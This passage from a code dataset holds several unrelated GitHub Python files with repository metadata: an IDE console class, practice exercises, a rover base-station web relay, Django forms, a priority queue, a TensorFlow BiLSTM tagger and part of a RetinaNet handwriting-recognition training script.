\"\"\"Triggered when the user finished input in the redirected IO tab\"\"\"\n self.__debugger.remoteRawInput(userInput)\n\n def updateIOConsoleTooltip(self, procuuid, msg):\n \"\"\"Updates the IO console tooltip\"\"\"\n index = self.__getIOConsoleIndex(procuuid)\n if index is not None:\n tooltip = self._bottomSideBar.tabToolTip(index)\n tooltip = tooltip.replace(\"(running)\", \"(\" + msg + \")\")\n self._bottomSideBar.setTabToolTip(index, tooltip)\n\n def __getIOConsoleIndex(self, procuuid):\n \"\"\"Provides the IO console index by the thread ID\"\"\"\n index = self._bottomSideBar.count - 1\n while index >= 0:\n widget = self._bottomSideBar.widget(index)\n if hasattr(widget, \"procuuid\"):\n if widget.procuuid == procuuid:\n return index\n index -= 1\n return None\n\n def __onCloseIOConsole(self, procuuid):\n \"\"\"Closes the tab with the corresponding widget\"\"\"\n index = self.__getIOConsoleIndex(procuuid)\n if index is not None:\n self._bottomSideBar.removeTab(index)\n\n def closeAllIOConsoles(self):\n \"\"\"Closes all IO run/profile tabs and 
clears the debug IO console\"\"\"\n QApplication.setOverrideCursor(QCursor(Qt.WaitCursor))\n index = self._bottomSideBar.count - 1\n while index >= 0:\n widget = self._bottomSideBar.widget(index)\n if hasattr(widget, 'procuuid'):\n if hasattr(widget, \"stopAndClose\"):\n widget.stopAndClose()\n index -= 1\n QApplication.restoreOverrideCursor()\n\n def getIOConsoles(self):\n \"\"\"Provides a list of the current IO consoles\"\"\"\n consoles = []\n index = self._bottomSideBar.count - 1\n while index >= 0:\n widget = self._bottomSideBar.widget(index)\n if hasattr(widget, 'procuuid'):\n consoles.append(widget)\n index -= 1\n return consoles\n\n def onReuseConsole(self, widget, kind):\n \"\"\"Called when a console is reused\"\"\"\n caption, name, tooltip = self.__getCaptionNameTooltip(kind)\n self._bottomSideBar.tabButton(widget, QTabBar.RightSide).hide()\n self._bottomSideBar.updateTabName(widget, name)\n self._bottomSideBar.setTabText(widget, caption)\n self._bottomSideBar.setTabToolTip(widget, tooltip)\n self._bottomSideBar.show()\n self._bottomSideBar.setCurrentTab(widget)\n self._bottomSideBar.raise_()\n widget.setFocus()\n\n def onConsoleFinished(self, widget):\n \"\"\"Triggered when a process finished one way or another\"\"\"\n self._bottomSideBar.tabButton(widget, QTabBar.RightSide).show()\n","repo_name":"SergeySatskiy/codimension","sub_path":"codimension/ui/mainredirectedio.py","file_name":"mainredirectedio.py","file_ext":"py","file_size_in_byte":7251,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"54"} +{"seq_id":"14884422371","text":"\nfrom itertools import combinations\ndef pair_sum(lst, k):\n\n if len(lst) < 2:\n print('Array is too small')\n \n numbers = list(combinations(lst, 2))\n print(numbers)\n\n for group in numbers:\n if sum(group) == k:\n\n print(group)\n\n# pair_sum([1,3,2,2,5], 6)\n\ndef pair_sum2(array, k):\n \n if len(array) < 2:\n print('Array is too small')\n \n seen = set()\n output = set()\n\n for num in array:\n\n target = k - num\n\n if target not in seen:\n seen.add(num)\n\n else:\n output.add((min(num, target), max(num, target)))\n\n for i in list(output):\n print(i)\n\npair_sum2([1,3,2,2], 4)\n\n\n\n\ndef largest_sum(array):\n\n if len(array) == 0:\n return print('array too small')\n\n max_sum = array[0]\n current_sum = array[0]\n\n for num in array[1:]:\n current_sum = max(current_sum + num, num)\n max_sum = max(current_sum, max_sum)\n \n return max_sum\n\n\n# print(largest_sum([7,1,2,-1,3,4,10,-12,3,21,-19]))\n\n\n\ndef reverse_string(string):\n\n l = string.split(' ')\n\n alist = reversed(l)\n\n print(' '.join(alist))\n\n \n\n\n# reverse_string('This is the best')\n\ndef rotation(l1, l2):\n\n if len(l1) != len(l2):\n return False\n\n key = l1[0]\n key_index = 0\n\n for i in range(len(l2)):\n if l2[i] == key:\n key_index = i\n \n break\n\n if key_index == 0:\n return False\n\n for x in range(len(l1)):\n l2index = (key_index + x) % len(l1)\n\n if l1[x] != l2[l2index]:\n return False\n\n return True\n \n# print(rotation([1,2,3,4,5,6,7], [4,5,6,7,1,2,3]))\n\ndef commonElements(l1, l2):\n\n alist = []\n\n for i in l1:\n for j in l2:\n if i == j:\n alist.append(i)\n \n return alist\n\nprint(commonElements([1,3,4,6,7,9], [1,2,4,5,9,10]))\n ","repo_name":"Kalkulus1/python-recap","sub_path":"random_tests/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3639280875","text":"n_epochs = 
5\nlr = 0.01\nn_folds = 5\nlstm_input_size = 32\nhidden_state_size = 256\nn_layers = 2\ndropout = 0.125\nbidirectional = True\nbatch_size = 64\nnum_sequence_layers = 2\noutput_dim = 2 # !!!!!!!!!!!!!!!!!!!!!!!!\nnum_time_steps = 30 # !!!!!!!!!!!!!!\nrnn_type = 'LSTM'","repo_name":"NienkeWessel/ThesisCS","sub_path":"global_variables.py","file_name":"global_variables.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40927772976","text":"# I promise I'll document all of this later!\n# - Waverly Sonntag\nfrom http.server import SimpleHTTPRequestHandler, BaseHTTPRequestHandler, HTTPServer\nimport time\nfrom os.path import exists, splitext\nimport socket\n\nweb_host_name = \"localhost\" # is genuinely localhost\nweb_port = 8081\n\ntcp_port = 8082\ntcp_host_name = \"192.168.1.123\" # would be the Jetson's hardcoded IP address\n\n\nclass my_server(BaseHTTPRequestHandler):\n def do_GET(self):\n if self.path == '/':\n self.path = '/index.html'\n existy = exists('frontend' + self.path)\n if (existy):\n self.send_response(200)\n exty = splitext(self.path)[1]\n if (exty == '.html'):\n self.send_header(\"Content-type\", \"text/html\")\n elif (exty == '.svg'):\n self.send_header(\"Content-type\", \"image/svg+xml\")\n elif (exty == '.css'):\n self.send_header(\"Content-type\", \"text/css\")\n elif (exty == '.js'):\n self.send_header(\"Content-type\", \"text/javascript\")\n else:\n self.send_header(\"content-type\", \"application/octet-stream\")\n self.end_headers()\n f = open('frontend' + self.path, 'r')\n self.wfile.write(bytes(f.read(), 'utf-8'))\n else:\n self.send_response(404)\n self.send_header(\"Content-type\", \"text/plain\")\n self.end_headers()\n self.wfile.write(bytes('404', 'utf-8'))\n def do_POST(self):\n if (self.path.startswith(\"/reportstate\")):\n tcp_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print(\"TCP client initialized.\")\n # make TCP connection\n try:\n tcp_client.connect((tcp_host_name, tcp_port))\n tcp_client.sendall(bytes(self.rfile.read(int(self.headers['Content-Length'])).decode('utf-8'), 'utf-8'))\n\n received = tcp_client.recv(1024)\n except Exception as e:\n received = '!'.encode()\n print(e)\n finally:\n tcp_client.close()\n print(\"TCP session done\")\n\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/plain\")\n self.end_headers()\n self.wfile.write(bytes(received.decode(), 'utf-8'))\n #self.wfile.write(bytes(self.rfile.read(int(self.headers['Content-Length'])).decode('utf-8'), 'utf-8'))\n else:\n self.send_response(404)\n self.send_header(\"Content-type\", \"text/plain\")\n self.end_headers()\n self.wfile.write(bytes(\"404\", \"utf-8\"))\n\nif __name__ == \"__main__\":\n web_server = HTTPServer((web_host_name, web_port), my_server)\n print(\"HTTP server started http://%s:%s\" % (web_host_name, web_port))\n\n try:\n web_server.serve_forever()\n except KeyboardInterrupt:\n pass\n\n web_server.server_close()\n print(\"Webserver stopped.\")\n","repo_name":"NIURoverTeam/communications","sub_path":"if_webserver_basestation.py","file_name":"if_webserver_basestation.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18583538217","text":"from crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Submit\nfrom django import forms\nfrom django.urls import reverse\n\nfrom main.models import WorkOrder, Client, Site, 
Manufacturer, Part, LineItem\n\n\nclass WorkOrderForm(forms.ModelForm):\n    class Meta:\n        model = WorkOrder\n        fields = ['title', 'scope', 'client', 'site', 'status']\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.helper = FormHelper()\n        self.helper.add_input(Submit('submit', 'Submit'))\n\n\nclass ClientForm(forms.ModelForm):\n    class Meta:\n        model = Client\n        fields = ['name', 'slug']\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.helper = FormHelper()\n        self.helper.add_input(Submit('submit', 'Submit'))\n\n\nclass SiteForm(forms.ModelForm):\n    class Meta:\n        model = Site\n        fields = ['client', 'site_name', 'slug', 'address', 'note']\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.helper = FormHelper()\n        self.helper.add_input(Submit('submit', 'Submit'))\n\n\nclass ManufacturerForm(forms.ModelForm):\n    class Meta:\n        model = Manufacturer\n        fields = ['name', 'slug', 'note']\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.helper = FormHelper()\n        self.helper.add_input(Submit('submit', 'Submit'))\n\n\nclass PartForm(forms.ModelForm):\n    class Meta:\n        model = Part\n        fields = ['manufacturer', 'name', 'description', 'cost', 'note', 'link', ]\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.helper = FormHelper()\n        self.helper.add_input(Submit('submit', 'Submit'))\n\n\nclass LineItemForm(forms.ModelForm):\n    class Meta:\n        model = LineItem\n        fields = [\n            'part',\n            'description',\n            'location',\n            'quantity',\n            'cost',\n            'extended_cost',\n            'source',\n            'note',\n            'item_price',\n        ]\n\n    def __init__(self, work_order_id, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.helper = FormHelper()\n        self.helper.form_action = reverse('workorders_add_line_item', kwargs={'pk': work_order_id})\n        # print(self.instance)\n        # if self.instance:\n        #     self.helper.add_input(Submit('submit', 'Save'))\n        # else:\n        self.helper.add_input(Submit('submit', 'Create'))\n","repo_name":"kpavlovsky/joeyadmin","sub_path":"main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"71025039841","text":"from threading import Thread, ThreadError\nimport sys,os\nimport time\nimport random\n\ndef insert(array,queue,rightIndex,token):\n    # Compare priorities stored in the queue mapping: token -> (priority, client)\n    i = rightIndex\n    while (i >= 0 and queue[array[i]][0] > queue[token][0]):\n        array[i+1] = array[i]\n        i-=1\n    array[i+1] = token\n\ndef insertion_sort(queue,array):\n    for i in range(1,len(array)):\n        insert(array,queue,i-1,array[i])\n    return array\n\n\nclass Queue:\n    def __init__(self):\n        self.memory = dict()\n        self.wait_queue = list()\n        self.isPriority = False\n    def put(self,c):\n        try:\n            self.memory[c.token] = (c.priority, c)\n            if self.isPriority:\n                self.wait_queue.append(c.token)\n                # Walk the queue to check whether\n                # the new client has higher priority\n                self.wait_queue = insertion_sort(self.memory, self.wait_queue)\n                # print (self.wait_queue, self.memory)\n            else:\n                self.wait_queue.append(c.token)\n            return True\n        except Exception as err:\n            print(\"Queue\",err)\n            return False\n    def get(self, token):\n        return self.memory[token]\n    def front(self):\n        return self.wait_queue[0]\n    def size (self):\n        return len(self.memory)\n    def getQueue(self):\n        return self.memory\n    def remove(self,token):\n        try:\n            del(self.memory[token])\n            self.wait_queue.remove(token)\n            return True\n        except Exception as err:\n            print(err)\n            return 
False\n","repo_name":"AnaHauachen/Queue-Data-Structure","sub_path":"queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"27495357511","text":"from __future__ import print_function\nfrom __future__ import division\nimport tensorflow as tf\nfrom src.utils import tf_utils\n\n\nclass BiLSTMChar(object):\n    \"\"\"\n    A bidirectional LSTM for embedding tokens.\n    \"\"\"\n\n    def __init__(self, char_domain_size, char_embedding_dim, hidden_dim, embeddings=None):\n        \"\"\"\n        Initializing a Bi-LSTM layer for character embedding of a word\n        :param char_domain_size:\n        :param char_embedding_dim:\n        :param hidden_dim:\n        :param embeddings:\n        \"\"\"\n        ################################################################################\n        # Initializing the object variables\n        ################################################################################\n        # Domain size of the characters: number of unique characters\n        self.char_domain_size = char_domain_size\n        # Size of the embedding\n        self.embedding_size = char_embedding_dim\n        # Size of the hidden dimension\n        self.hidden_dim = hidden_dim\n        # Size of the output: double of the hidden dimension\n        self.output_size = 2 * self.hidden_dim\n\n        print(\"Bi-LSTM char embedding model\")\n        print(\"embedding dim: \", self.embedding_size)\n        print(\"out dim: \", self.output_size)\n\n        ################################################################################\n        # Initializing the TensorFlow variables\n        ################################################################################\n\n        # PLACEHOLDERS\n        # char embedding input\n        self.input_chars = tf.placeholder(tf.int64, [None, None], name=\"input_chars\")\n        # batch size\n        self.batch_size = tf.placeholder(tf.int32, None, name=\"batch_size\")\n        # Max number of words in a sentence\n        self.max_seq_len = tf.placeholder(tf.int32, None, name=\"max_seq_len\")\n        # Max length of a token\n        self.max_tok_len = tf.placeholder(tf.int32, None, name=\"max_tok_len\")\n        # dropout probabilities\n        self.input_dropout_keep_prob = tf.placeholder_with_default(1.0, [], name=\"input_dropout_keep_prob\")\n        # sequence lengths for each sentence\n        self.sequence_lengths = tf.placeholder(tf.int32, [None, None], name=\"sequence_lengths\")\n        # token length of all tokens in a sentence\n        self.token_lengths = tf.placeholder(tf.int32, [None, None], name=\"tok_lengths\")\n        # Embedding layer\n        shape = (char_domain_size - 1, self.embedding_size)\n        self.char_embeddings = tf_utils.initialize_embeddings(shape, name=\"char_embeddings\", pretrained=embeddings)\n\n        ################################################################################\n        # Processing the forward layer\n        ################################################################################\n        self.outputs = self.forward(self.input_chars, self.input_dropout_keep_prob, reuse=False)\n\n    def forward(self, input_chars, input_dropout_keep_prob, reuse=True):\n        \"\"\"\n        Computing the forward pass of the network\n        :param input_chars:\n        :param input_dropout_keep_prob:\n        :param reuse:\n        :return:\n        \"\"\"\n        with tf.variable_scope(\"char-forward\", reuse=reuse):\n            char_embeddings_lookup = tf.nn.embedding_lookup(self.char_embeddings, input_chars)\n            char_embeddings_flat = tf.reshape(char_embeddings_lookup, tf.stack(\n                [self.batch_size * self.max_seq_len, self.max_tok_len, self.embedding_size]))\n            tok_lens_flat = tf.reshape(self.token_lengths, [self.batch_size * self.max_seq_len])\n
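            # Added comment: per the placeholders above, char_embeddings_flat is\n            # [batch_size*max_seq_len, max_tok_len, embedding_size], one row of characters per token, and\n            # tok_lens_flat holds each token's true character length so the BiLSTM below can skip padding.\n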
input_feats_drop = tf.nn.dropout(char_embeddings_flat, input_dropout_keep_prob)\n with tf.name_scope(\"char-bilstm\"):\n fwd_cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_dim, state_is_tuple=True)\n bwd_cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_dim, state_is_tuple=True)\n lstm_outputs, _ = tf.nn.bidirectional_dynamic_rnn(cell_fw=fwd_cell, cell_bw=bwd_cell, dtype=tf.float32,\n inputs=input_feats_drop,\n parallel_iterations=32, swap_memory=False,\n sequence_length=tok_lens_flat)\n outputs_fw = lstm_outputs[0]\n outputs_bw = lstm_outputs[1]\n # this is batch*output_size (flat)\n fw_output = tf_utils.last_relevant(outputs_fw, tok_lens_flat)\n # this is batch * max_seq_len * output_size\n bw_output = outputs_bw[:, 0, :]\n hidden_outputs = tf.concat(axis=1, values=[fw_output, bw_output])\n hidden_outputs_unflat = tf.reshape(hidden_outputs,\n tf.stack([self.batch_size, self.max_seq_len, self.output_size]))\n return hidden_outputs_unflat\n\n\nclass BiLSTM(object):\n \"\"\"\n A bidirectional LSTM for text classification.\n This class implements a BiLSTM layer as described in the paper : https://arxiv.org/pdf/1508.01991.pdf\n \"\"\"\n\n def __init__(self, num_classes, vocab_size, shape_domain_size, char_domain_size, char_size,\n embedding_size, shape_size, nonlinearity, viterbi, hidden_dim, char_embeddings, embeddings=None):\n\n \"\"\"\n Initializing a BiLSTM layer with parameters\n :param num_classes:\n :param vocab_size:\n :param char_domain_size:\n :param char_size:\n :param embedding_size:\n :param shape_size:\n :param nonlinearity:\n :param viterbi:\n :param hidden_dim:\n :param char_embeddings:\n :param embeddings:\n \"\"\"\n ################################################################################\n # Initializing the object variables\n ################################################################################\n # Number of output classes : In our case number of distinct labels\n self.num_classes = num_classes\n # Maximum character size in a word token : Used for padding and boolean masking\n self.char_size = char_size\n # Character embeddings of the word\n self.char_embeddings = char_embeddings\n # Dimension of word embedding : Useful when there is no pre-trained word embedding\n self.embedding_size = embedding_size\n # Dimension of the hidden layer of the LSTM\n self.hidden_dim = hidden_dim\n # Type of non-linear function used\n self.nonlinearity = nonlinearity\n # Boolean flag to determine if CRF is to be used\n self.viterbi = viterbi\n # Vocab size\n self.vocab_size = vocab_size\n # Shape domain size\n self.shape_domain_size = shape_domain_size\n # Shape Size\n self.shape_size = shape_size\n # Whether we need to use character embeddings as input\n self.use_characters = self.char_size != 0\n # Whether we need to use shape embeddings as input\n self.use_shape = self.shape_size != 0\n # Declaring the word embedding shape\n self.word_embeddings_shape = (vocab_size - 1, embedding_size)\n ################################################################################\n # Initializing the TensorFlow variables\n ################################################################################\n\n # PLACEHOLDERS\n # word embedding input : 2-D int matrix\n self.input_x1 = tf.placeholder(tf.int64, [None, None], name=\"input_x1\")\n # shape embedding input\n self.input_x2 = tf.placeholder(tf.int64, [None, None], name=\"input_x2\")\n # labels : 2-D int matrix\n self.input_y = tf.placeholder(tf.int64, [None, None], name=\"input_y\")\n # padding mask\n self.input_mask = 
tf.placeholder(tf.float32, [None, None], name=\"input_mask\")\n # Batch size\n self.batch_size = tf.placeholder(tf.int32, None, name=\"batch_size\")\n # Maximum sequence length\n self.max_seq_len = tf.placeholder(tf.int32, None, name=\"max_seq_len\")\n # sequence lengths padded with zeros\n self.sequence_lengths = tf.placeholder(tf.int32, [None, None], name=\"sequence_lengths\")\n # dropout and l2 penalties\n self.middle_dropout_keep_prob = tf.placeholder_with_default(1.0, [], name=\"middle_dropout_keep_prob\")\n self.hidden_dropout_keep_prob = tf.placeholder_with_default(1.0, [], name=\"hidden_dropout_keep_prob\")\n self.input_dropout_keep_prob = tf.placeholder_with_default(1.0, [], name=\"input_dropout_keep_prob\")\n self.l2_penalty = tf.placeholder_with_default(0.0, [], name=\"l2_penalty\")\n self.projection = tf.placeholder_with_default(False, [], name=\"projection\")\n self.drop_penalty = tf.placeholder_with_default(0.0, [], name=\"drop_penalty\")\n\n # CONSTANTS\n # Keeping track of l2 regularization loss (optional)\n self.l2_loss = tf.constant(0.0)\n # set the pad token to a constant 0 vector\n self.word_zero_pad = tf.constant(0.0, dtype=tf.float32, shape=[1, embedding_size])\n self.shape_zero_pad = tf.constant(0.0, dtype=tf.float32, shape=[1, shape_size])\n self.char_zero_pad = tf.constant(0.0, dtype=tf.float32, shape=[1, char_size])\n # Declaring transition probabilities to use when it is CRF\n if self.viterbi:\n self.transition_params = tf.get_variable(\"transitions\", [num_classes, num_classes])\n # Initializing Word-Embedding layer\n self.w_e = tf_utils.initialize_embeddings(self.word_embeddings_shape, name=\"w_e\", pretrained=embeddings)\n\n # Since 0 is padding : calculating non-zero values for masking\n nonzero_elements = tf.not_equal(self.sequence_lengths, tf.zeros_like(self.sequence_lengths))\n count_nonzero_per_row = tf.reduce_sum(tf.to_int32(nonzero_elements), axis=1)\n self.flat_sequence_lengths = tf.add(tf.reduce_sum(self.sequence_lengths, 1),\n tf.scalar_mul(2, count_nonzero_per_row))\n\n # Calling the forward layer\n self.unflat_scores, self.hidden_layer = self.forward(self.input_x1, self.input_x2, self.max_seq_len,\n self.hidden_dropout_keep_prob,\n self.input_dropout_keep_prob,\n self.middle_dropout_keep_prob, reuse=False)\n # Calling loss function\n self.loss = self.get_loss()\n\n # Getting predictions\n self.predictions = self.get_predictions()\n\n def get_loss(self):\n \"\"\"\n Calculate mean cross-entropy loss\n :return:\n \"\"\"\n with tf.name_scope(\"loss\"):\n labels = tf.cast(self.input_y, 'int32')\n if self.viterbi:\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(self.unflat_scores, labels,\n self.flat_sequence_lengths,\n transition_params=self.transition_params)\n # self.transition_params = transition_params\n loss = tf.reduce_mean(-log_likelihood)\n else:\n losses = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.unflat_scores, labels=labels)\n masked_losses = tf.multiply(losses, self.input_mask)\n loss = tf.div(tf.reduce_sum(masked_losses), tf.reduce_sum(self.input_mask))\n loss += self.l2_penalty * self.l2_loss\n unflat_no_dropout_scores, _ = self.forward(self.input_x1, self.input_x2, self.max_seq_len,\n hidden_dropout_keep_prob=1.0, input_dropout_keep_prob=1.0,\n middle_dropout_keep_prob=1.0)\n drop_loss = tf.nn.l2_loss(tf.subtract(self.unflat_scores, unflat_no_dropout_scores))\n loss += self.drop_penalty * drop_loss\n return loss\n\n def get_predictions(self):\n \"\"\"\n Get prediction scores\n :return:\n \"\"\"\n 
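# Added comment: unflat_scores holds per-token class logits; when viterbi=True they are decoded\n        # later with the learned CRF transition_params, otherwise the argmax below picks each label.\n        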
with tf.name_scope(\"predictions\"):\n if self.viterbi:\n predictions_scores = self.unflat_scores\n else:\n predictions_scores = tf.argmax(self.unflat_scores, 2)\n return predictions_scores\n\n def forward(self, input_x1, input_x2, max_seq_len, hidden_dropout_keep_prob,\n input_dropout_keep_prob, middle_dropout_keep_prob, reuse=True):\n \"\"\"\n Passing the inputs through the forward layer\n :param input_x1:\n :param max_seq_len:\n :param hidden_dropout_keep_prob:\n :param input_dropout_keep_prob:\n :param middle_dropout_keep_prob:\n :param reuse:\n :return:\n \"\"\"\n word_embeddings = tf.nn.embedding_lookup(self.w_e, input_x1)\n with tf.variable_scope(\"forward\", reuse=reuse):\n input_list = [word_embeddings]\n input_size = self.embedding_size\n if self.use_characters:\n input_list.append(self.char_embeddings)\n input_size += self.char_size\n if self.use_shape:\n shape_embeddings_shape = (self.shape_domain_size - 1, self.shape_size)\n w_s = tf_utils.initialize_embeddings(shape_embeddings_shape, name=\"w_s\")\n shape_embeddings = tf.nn.embedding_lookup(w_s, input_x2)\n input_list.append(shape_embeddings)\n input_size += self.shape_size\n\n input_feats = tf.concat(axis=2, values=input_list)\n input_feats_expanded_drop = tf.nn.dropout(input_feats, input_dropout_keep_prob)\n total_output_width = 2 * self.hidden_dim\n with tf.variable_scope(\"bilstm\", reuse=reuse):\n fwd_cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_dim, state_is_tuple=True)\n bwd_cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_dim, state_is_tuple=True)\n lstm_outputs, _ = tf.nn.bidirectional_dynamic_rnn(cell_fw=fwd_cell, cell_bw=bwd_cell, dtype=tf.float32,\n inputs=input_feats_expanded_drop,\n parallel_iterations=50,\n sequence_length=self.flat_sequence_lengths)\n hidden_outputs = tf.concat(axis=2, values=lstm_outputs)\n\n h_concat_flat = tf.reshape(hidden_outputs, [-1, total_output_width])\n\n # Add dropout\n with tf.name_scope(\"middle_dropout\"):\n h_drop = tf.nn.dropout(h_concat_flat, middle_dropout_keep_prob)\n\n # second projection\n with tf.name_scope(\"tanh_proj\"):\n w_tanh = tf_utils.initialize_weights([total_output_width, self.hidden_dim], \"w_tanh\",\n init_type=\"xavier\")\n b_tanh = tf.get_variable(initializer=tf.constant(0.01, shape=[self.hidden_dim]), name=\"b_tanh\")\n self.l2_loss += tf.nn.l2_loss(w_tanh)\n self.l2_loss += tf.nn.l2_loss(b_tanh)\n h2_concat_flat = tf.nn.xw_plus_b(h_drop, w_tanh, b_tanh, name=\"h2_tanh\")\n h2_tanh = tf_utils.apply_nonlinearity(h2_concat_flat, self.nonlinearity)\n\n # Add dropout\n with tf.name_scope(\"hidden_dropout\"):\n h2_drop = tf.nn.dropout(h2_tanh, hidden_dropout_keep_prob)\n\n # Final (unnormalized) scores and predictions\n with tf.name_scope(\"output\"):\n w_o = tf_utils.initialize_weights([self.hidden_dim, self.num_classes], \"w_o\", init_type=\"xavier\")\n b_o = tf.get_variable(initializer=tf.constant(0.01, shape=[self.num_classes]), name=\"b_o\")\n self.l2_loss += tf.nn.l2_loss(w_o)\n self.l2_loss += tf.nn.l2_loss(b_o)\n scores = tf.nn.xw_plus_b(h2_drop, w_o, b_o, name=\"scores\")\n unflat_scores = tf.reshape(scores, tf.stack([self.batch_size, max_seq_len, self.num_classes]))\n return unflat_scores, hidden_outputs\n","repo_name":"agankur21/entity_disambiguation","sub_path":"src/models/bilstm.py","file_name":"bilstm.py","file_ext":"py","file_size_in_byte":16396,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"74028147042","text":"import editdistance\nimport time\nimport os\nimport copy\nimport 
argparse\nimport pdb\nimport collections\nimport sys\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.autograd import Variable\nfrom torchvision import datasets, models, transforms\nimport torchvision\n\nimport model\nfrom anchors import Anchors\nimport losses\nfrom dataloader import CSVDataset, collater, Resizer, AspectRatioBasedSampler, Augmenter, UnNormalizer, Normalizer\nfrom torch.utils.data import Dataset, DataLoader\n\nimport csv_eval\nfrom get_transcript import get_transcript\n\nfrom warpctc_pytorch import CTCLoss\n#from torch_baidu_ctc import CTCLoss\n#assert torch.__version__.split('.')[1] == '4'\n\nprint(('CUDA available: {}'.format(torch.cuda.is_available())))\n\n\ndef main(args=None):\n\n    parser = argparse.ArgumentParser(description='Simple training script for training a RetinaNet network.')\n\n    parser.add_argument('--dataset', help='Dataset type, must be one of csv or coco.',default = \"csv\")\n    parser.add_argument('--coco_path', help='Path to COCO directory')\n    parser.add_argument('--csv_train', help='Path to file containing training annotations (see readme)')\n    parser.add_argument('--csv_classes', help='Path to file containing class list (see readme)',default=\"binary_class.csv\")\n    parser.add_argument('--csv_val', help='Path to file containing validation annotations (optional, see readme)')\n\n    parser.add_argument('--depth', help='Resnet depth, must be one of 18, 34, 50, 101, 152', type=int, default=18)\n    parser.add_argument('--epochs', help='Number of epochs', type=int, default=500)\n    parser.add_argument('--epochs_only_det', help='Number of epochs to train detection part', type=int, default=1)\n    parser.add_argument('--max_epochs_no_improvement', help='Max epochs without improvement',type=int,default=100)\n    parser.add_argument('--pretrained_model', help='Path of .pt file with pretrained model',default = 'esposallescsv_retinanet_0.pt')\n    parser.add_argument('--model_out', help='Path of .pt file with trained model to save',default = 'trained')\n\n    parser.add_argument('--score_threshold', help='Score above which boxes are kept',type=float,default=0.5)\n    parser.add_argument('--nms_threshold', help='IoU overlap threshold used for non-maximum suppression',type=float,default=0.2)\n    parser.add_argument('--max_boxes', help='Max boxes to be fed to recognition',default=95)\n    parser.add_argument('--seg_level', help='[line, word], to choose anchor aspect ratio',default='word')\n    parser.add_argument('--early_stop_crit', help='Early stop criterion, detection (map) or transcription (cer)',default='cer')\n    parser.add_argument('--max_iters_epoch', help='Max steps per epoch (for debugging)',default=1000000)\n    parser.add_argument('--train_htr',help='Train recognition or not',default='True')\n    parser.add_argument('--train_det',help='Train detection or not',default='True')\n    parser.add_argument('--htr_gt_box',help='Train recognition branch with box gt (for debugging)',default='False')\n    \n    parser = parser.parse_args(args)\n\n    if parser.dataset == 'csv':\n\n        if parser.csv_train is None:\n            raise ValueError('Must provide --csv_train')\n\n        dataset_name = parser.csv_train.split(\"/\")[-2]\n        \n        dataset_train = CSVDataset(train_file=parser.csv_train, class_list=parser.csv_classes, transform=transforms.Compose([Normalizer(), Augmenter(), Resizer()]))\n\n        if parser.csv_val is None:\n            dataset_val = None\n            print('No validation annotations provided.')\n        else:\n            dataset_val = CSVDataset(train_file=parser.csv_val, 
class_list=parser.csv_classes, transform=transforms.Compose([Normalizer(), Resizer()]))\n\n else:\n raise ValueError('Dataset type not understood (must be csv or coco), exiting.')\n\n # Files for training log\n\n experiment_id =str(time.time()).split('.')[0]\n valid_cer_f=open(experiment_id+'_valid_CER.txt','w')\n for arg in vars(parser):\n if getattr(parser, arg) is not None:\n valid_cer_f.write(str(arg)+' '+str(getattr(parser, arg))+'\\n')\n valid_cer_f.close()\n\n\n \n sampler = AspectRatioBasedSampler(dataset_train, batch_size=1,drop_last=False)\n dataloader_train = DataLoader(dataset_train, num_workers=3, collate_fn=collater, batch_sampler=sampler)\n \n if dataset_val is not None:\n sampler_val = AspectRatioBasedSampler(dataset_val, batch_size=1, drop_last=False)\n dataloader_val = DataLoader(dataset_val, num_workers=0, collate_fn=collater, batch_sampler=sampler_val)\n\n if not os.path.exists('trained_models'):\n os.mkdir('trained_models')\n\n # Create the model\n \n train_htr = parser.train_htr=='True'\n htr_gt_box = parser.htr_gt_box=='True'\n torch.backends.cudnn.benchmark= False \n \n\n alphabet=dataset_train.alphabet\n if os.path.exists(parser.pretrained_model):\n retinanet = torch.load(parser.pretrained_model)\n else:\n if parser.depth == 18:\n retinanet = model.resnet18(\n num_classes=dataset_train.num_classes(), \n pretrained=True,\n max_boxes=int(parser.max_boxes),\n score_threshold=float(parser.score_threshold),\n seg_level=parser.seg_level,\n alphabet=alphabet,\n train_htr=train_htr,\n htr_gt_box=htr_gt_box)\n\n elif parser.depth == 34:\n\n retinanet = model.resnet34(\n num_classes=dataset_train.num_classes(), \n pretrained=True,\n max_boxes=int(parser.max_boxes),\n score_threshold=float(parser.score_threshold),\n seg_level=parser.seg_level,\n alphabet=alphabet,\n train_htr=train_htr,\n htr_gt_box=htr_gt_box)\n\n elif parser.depth == 50:\n retinanet = model.resnet50(num_classes=dataset_train.num_classes(), pretrained=True)\n elif parser.depth == 101:\n retinanet = 